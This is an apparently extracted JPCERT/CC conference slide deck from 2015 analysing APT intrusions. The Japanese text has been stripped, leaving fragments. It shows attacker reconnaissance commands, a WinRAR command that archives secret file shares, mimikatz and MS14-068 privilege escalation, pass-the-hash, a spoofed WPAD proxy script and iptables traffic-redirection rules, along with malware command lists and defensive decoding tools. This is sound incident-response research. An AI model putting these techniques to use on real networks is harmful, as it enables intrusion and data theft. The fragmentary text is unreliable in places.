JPCERT CODE BLUE 2015

Copyright2015 JPCERT/CC All rights reserved.

0

1 A B

Copyright2015 JPCERT/CC All rights reserved.2 A B

Copyright2015 JPCERT/CC All rights reserved.

JPCERT

3 (Shusei Tomonaga)

(Yuu Nakamura)

Copyright2015 JPCERT/CC All rights reserved.JPCERT Japan Computer Emergency Response Team Coordination CenterCSIRT 4

Copyright2015 JPCERT/CC All rights reserved.

4

JPCERT/CC

5201549934

130

934AB

Copyright2015 JPCERT/CC All rights reserved.6

Copyright2015 JPCERT/CC All rights reserved.7 A B

Copyright2015 JPCERT/CC All rights reserved.

8

A

Copyright2015 JPCERT/CC All rights reserved.Flash Player (CVE-2015-5119CVE-2015-5122)MS14-068(Kerberos (3011780))- CVE-2014-63248

9

Copyright2015 JPCERT/CC All rights reserved.10

Copyright2015 JPCERT/CC All rights reserved.11Timeline of Attack Vector()Drive-ByDownload2014/052015/012015/052015/07CVE-2014-7247CVE-2015-5119CVE-2015-5122

zip lzh 2014/092014/112015/09

Copyright2015 JPCERT/CC All rights reserved.

11

12

Copyright2015 JPCERT/CC All rights reserved.13MS

Copyright2015 JPCERT/CC All rights reserved.dsquery14

Copyright2015 JPCERT/CC All rights reserved.Nirsoft Mail PassView

15

Copyright2015 JPCERT/CC All rights reserved.16

Copyright2015 JPCERT/CC All rights reserved.

16

1> net use

-------------------------------------------------------------------------------OK T:\\FILESV01\SECRET Microsoft Windows NetworkOK U:\\FILESV02\SECRET Microsoft Windows Network> wmic logicaldisk get caption,providername,drivetype,volumenameCaption DriveType ProviderName VolumeNameC: 3OSD: 3 T: 4 \\FILESV01\SECRET U: 4 \\FILESV01\SECRET NET USEwmic

17DriveType = 4

Copyright2015 JPCERT/CC All rights reserved. 2> netstat an

TCP 192.168.xx.xx:49217 192.168.yy.yy:445 ESTABLISHED

> nbtstat -a 192.168.yy.yy ---------------------------------------------FILESV01 netstat nbtstat 445

18

Copyright2015 JPCERT/CC All rights reserved.> dir c:\users\hoge\*.doc* /s /o-d

c:\users\hoge\AppData\Local\Temp

2014/07/29 10:19 28,672 20140820.doc1 28,672

c:\users\hoge\

2015/08/29 10:03 1,214 .doc> dir \\FILESV01\SECRET

\\FILESV\SECRET

2014/07/11 09:16 [DIR] 2014/09/04 11:49 [DIR] 2014/08/01 09:27 [DIR] 19dir/s : /o-d :

Copyright2015 JPCERT/CC All rights reserved.> winrar.exe a r ed v300m ta20140101 %TEMP%\a.rar \\FILESV01\SECRET\ -n*.ppt* -n*.doc* -n*.xls* -n*.jtd

Adding \\FILESV01\SECRET\\(2015.05.01).docx OKAdding \\FILESV01\SECRET\\.ppt OKAdding \\FILESV01\SECRET\\.xlsx OKAdding \\FILESV01\SECRET\\.jtd OKC&Crar 20RAR

Copyright2015 JPCERT/CC All rights reserved.21

Copyright2015 JPCERT/CC All rights reserved.22

Copyright2015 JPCERT/CC All rights reserved.

(MS14-068 + MS14-058) 23

DomainControllerPC-A

PC-B

1. (MS14-058) mimikatz

2. MS14-068 Domain Admin 3. DC mimikatz admin 4. PC-B 5. 6.

Copyright2015 JPCERT/CC All rights reserved.

23

SYSVOL 24

C2 Server3. admin PC-A

PC-B

6.

2. 1.

DomainController5. 4. PC-B

Copyright2015 JPCERT/CC All rights reserved.

25

PC-A

PC-B

4. 3.

1. Domain Admins 5. DomainController2. logon.exe

Copyright2015 JPCERT/CC All rights reserved.Builtin Administrator 26

PC-A

PC-B

3.

1. (UAC bypass) 5. 4.

net use \\PC-B\IPC$ [password] /u:Administrator2. pass the hash or net use

Copyright2015 JPCERT/CC All rights reserved.

27

PC-A

PC-B

2.

1.

Copyright2015 JPCERT/CC All rights reserved.WPAD

DHCPURLhttp://wpad/wpad.dat

28

WPAD (Web Proxy Auto-Discovery)

Copyright2015 JPCERT/CC All rights reserved.WPAD(step 1: NetBIOS Spoofing)29

PC-A

PC-B

2. Name query response (I am WPAD)1. Broadcast: Name query NB WPADwpad.exe

Copyright2015 JPCERT/CC All rights reserved.WPAD(step 2: fake WPAD server)30

PC-A

PC-B

4. responsewpad.exe

function FindProxyForURL(url, host) {

if (myIpAddress() != [PC-A addr]) {return PROXY wpad:8888;DIRECT;}return DIRECT;}wpad.dat ()3. request http://wpad/wpad.dat

Copyright2015 JPCERT/CC All rights reserved.WPAD(step 3: man in the middle proxy)31

PC-A

PC-B

5. Web iframe wpad.exe

6. drive by download attack

Attackers Web Site

Web site

Copyright2015 JPCERT/CC All rights reserved.ADMS14-068DCSYSVOLBuiltin AdministratorWPAD

32

Copyright2015 JPCERT/CC All rights reserved.

33

Copyright2015 JPCERT/CC All rights reserved.34Emdivi (t17)HTTP BOTEXEEXE usp10jpgDLL, dataEmdivi(t19, t20)t17 HTTP BOTEXEBeginXEXEGStatusHTTP BOTEXE,DLL

: [. . MWS, 2015]

Copyright2015 JPCERT/CC All rights reserved.35Pass-the-hashQuarks PwDumpqp.exe, qd.exe, QDump.exeMimikatzLitegp.exeWindows credentials Editorwce.exe, ww.exeMimikatzmz.exe, mimikatz.exe, mimikatz.rar(sekurlsa.dll)MS14-068 (CVE-2014-6324)ms14-068.exems14-068.tar.gzMS14-058 ()(CVE-2014-4113)4113.exeUAC bypassUAC bypass msdart.exe, puac.exeHtran, proxyHtranhtproxy.exenirsoft Mail PassViewCallMail.exe, outl.exe logonlogon.exeWinRARyrar.exe, rar,exe dir dirasd.exetimestamp timestomp.exe

Copyright2015 JPCERT/CC All rights reserved.Emdivi (t17)

36DOABORTDOWNBGGETFILELOADDLLSETCMDSUSPENDUPLOADVERSIONGOTO20155CLEARLOGS20158

HTTP BOT

Copyright2015 JPCERT/CC All rights reserved.Emdivi (t20)

(JPCERT)

SID

37Emdivi

Copyright2015 JPCERT/CC All rights reserved.

usp10jpg

11 EmdiviDLL

38

dwmapi.dll

***.DAT

DLLDLL

Copyright2015 JPCERT/CC All rights reserved.usp10jpg 39

Emdivi

usp10jpg

Copyright2015 JPCERT/CC All rights reserved.BeginX

BeginX Server UDPTCP

BeginX ClientBeginX Server Emdivi 40

Copyright2015 JPCERT/CC All rights reserved.BeginX41

Emdivi

BeginxServer

BeginxClient

Emdivi

BeginX

Emdivi

Copyright2015 JPCERT/CC All rights reserved.42

EmdiviHTTP BOTGStatus

Copyright2015 JPCERT/CC All rights reserved.GStatus Web ()43

Copyright2015 JPCERT/CC All rights reserved.

44emdivi_string_decryptor.py

Copyright2015 JPCERT/CC All rights reserved.45emdivi_string_decryptor.py

Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py

46Emdivi encoded strings

Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py47Difference depending on version stringVer 17Ver 19 or 20Ver 20EncryptXxTEA encryptXxTEA decryptAES decryptDecryptXxTEA decryptXxTEA encryptAES encryptKeyMD5( MD5(base64(ver)) + MD5(key_string))Scanf( "%x", Inc_Add( ver17_key ))Inc_Add( ver17_key)

Copyright2015 JPCERT/CC All rights reserved.

47

emdivi_string_decryptor.py

48

Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py

49

Copyright2015 JPCERT/CC All rights reserved.Demo

50

Copyright2015 JPCERT/CC All rights reserved.51 A B

Copyright2015 JPCERT/CC All rights reserved.Attack techniques52

Copyright2015 JPCERT/CC All rights reserved.Attack techniques53

Copyright2015 JPCERT/CC All rights reserved.

54

Web

1. Web

. 0. Web

. .

Copyright2015 JPCERT/CC All rights reserved.

54

55.htaccessTarget nameIP address

Copyright2015 JPCERT/CC All rights reserved.0day Exploit56

Copyright2015 JPCERT/CC All rights reserved.Attack techniques57

Copyright2015 JPCERT/CC All rights reserved.

58

1.

0.

. .

.

.

Copyright2015 JPCERT/CC All rights reserved.

58

59

0. iptables

1.

Copyright2015 JPCERT/CC All rights reserved.

59

iptables -t nat -A PREROUTING -i eth0 -s aa.bb.cc.dd -p tcp --dport 80 -j DNAT --to-destination ww.xx.yy.zz:5360iptables

Copyright2015 JPCERT/CC All rights reserved.

60

Attack techniques61

Copyright2015 JPCERT/CC All rights reserved.

62

.comDNS

DNSWebDNSWeb0.

1.DNS2.DNS

4.Web

Copyright2015 JPCERT/CC All rights reserved.

62

iptables -t nat -A PREROUTING -p udp --dport 53 -m string --from 40 --to 46 --hex-string "|03|AAA" --algo bm -j DNAT --to-destination aa.bb.cc.dd:54

iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to ww.xx.yy.zz:5363iptablesDNS

AAA.example.com

Copyright2015 JPCERT/CC All rights reserved.

63

64

Copyright2015 JPCERT/CC All rights reserved.65

Copyright2015 JPCERT/CC All rights reserved.66

Copyright2015 JPCERT/CC All rights reserved. ()67commandinfo0x1840040x1840080x18400c0x1840100x1840140x1840180x18401c0x184020

commandinfo0x1840240x1840280x18402c0x184030Sleep0x1840340x184038Sleep Time0x18403c

HTTP

Copyright2015 JPCERT/CC All rights reserved.68WebC2

start: @MICR0S0FTend: C0RP0RATI0Nstart: lOve yOu 4 eveRend: Reve 4 uOy evOl

Copyright2015 JPCERT/CC All rights reserved. ()69command numberinfo01TickCount3456789-

Copyright2015 JPCERT/CC All rights reserved.70

ROP

ShellcodeMalwareCVE-2013-3918 with McRAT

Copyright2015 JPCERT/CC All rights reserved.71CVE-2013-3918 with McRAT

rundll32.exe

Shellcode

Copyright2015 JPCERT/CC All rights reserved. ()72HTTPcommandinfo downonly downexec -

Copyright2015 JPCERT/CC All rights reserved.Preshin Controller73

PHP

Copyright2015 JPCERT/CC All rights reserved.Preshin Controller74

Copyright2015 JPCERT/CC All rights reserved. ()75HTTPcommandinfo123457

commandinfo8-910111213

Copyright2015 JPCERT/CC All rights reserved. ()76Rootkitcommandinfo file information proxy connectHikit shell socks5(socks5) exit

Copyright2015 JPCERT/CC All rights reserved.Hikit77

Rootkit

Copyright2015 JPCERT/CC All rights reserved. ()78commandinfo cmd4 cmd5 cmd6Derusbi cmd7 cmd8 cmd9

Copyright2015 JPCERT/CC All rights reserved.

Derusbi79

Copyright2015 JPCERT/CC All rights reserved.80IdentityTypeCountry System IntegratorexeJapan Software VendorexeJapan Software VendorexeKorea AutomakerexeKorea Heavy IndustryjarKorea Software VendorexeKorea Electronics IndustryjarKorea Software VendorexeKorea

Copyright2015 JPCERT/CC All rights reserved.

81

Backdoor

C2

iptables

Copyright2015 JPCERT/CC All rights reserved.

81

Linux Backdoor82mod_rootme

Roronoa

Copyright2015 JPCERT/CC All rights reserved.Linux Backdoor83FunctionMyNetstatCreateShellMymkdirPortTunnelGetGetFileSourceMymkfilePortTunnel_RemoteCloseMyPsMyrmfilePortTunnel_ShowKillByPidMyrmdirCreatePortTunnelNewConnectToListDirPortForwardStartPutFilemy_rebootPortForward_ShowPutFileDestShowHidePortForward_CloseShellServerSwitchHide

Copyright2015 JPCERT/CC All rights reserved.

84apt17scan.py

Copyright2015 JPCERT/CC All rights reserved.apt17scan.py85

Copyright2015 JPCERT/CC All rights reserved.

apt17scan.py86Scan with YARASearch configuration data addressParse configuration dataDump configuration

Copyright2015 JPCERT/CC All rights reserved.apt17scan.py87apt17scan

Copyright2015 JPCERT/CC All rights reserved.apt17scan.py88derusbiconfig Derusbi

Copyright2015 JPCERT/CC All rights reserved.apt17scan.py89hikitconfig Hikit

Copyright2015 JPCERT/CC All rights reserved.apt17scan.py90agtidconfig Agtid

Copyright2015 JPCERT/CC All rights reserved.Demo

91

Copyright2015 JPCERT/CC All rights reserved.How to download92https://github.com/JPCERTCC

Copyright2015 JPCERT/CC All rights reserved.Thank You!aa-info@jpcert.or.jphttps://www.jpcert.or.jp

info@jpcert.or.jphttps://www.jpcert.or.jp/form/

Copyright2015 JPCERT/CC All rights reserved.

93